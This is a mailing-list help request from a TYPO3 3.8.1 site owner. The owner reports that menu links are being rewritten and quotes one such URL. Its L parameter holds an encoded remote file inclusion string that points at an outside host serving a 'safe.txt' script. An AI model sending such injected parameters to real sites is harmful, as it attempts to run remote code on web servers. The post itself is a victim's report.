[TYPO3-english] Typo 3 ver. 3.8.1 security problem

Hello guys,

I can't find security group so i'm writting here. Something strange is going 
on with sites on my Typo3 installation 3.8.1 (i know it's old but i patched 
all critical bugs). So, this is what's going on. First time the page is 
generated menu links are ok - they look like this:

http://www.my-site.com/1493.0.html

After i click on some menu item the same page menu gets strange paths like 
this:

http://www.my-site.com/1493.0.html?&L=1%2Findex.php%3Fgo%3Dhttp%3A%2F%2Fwww.pentaxclub.co.kr%2Fsite%2Fsafe.txt%3F%3F%3F

Anyone knows what's going on and how to repair this? Thx!
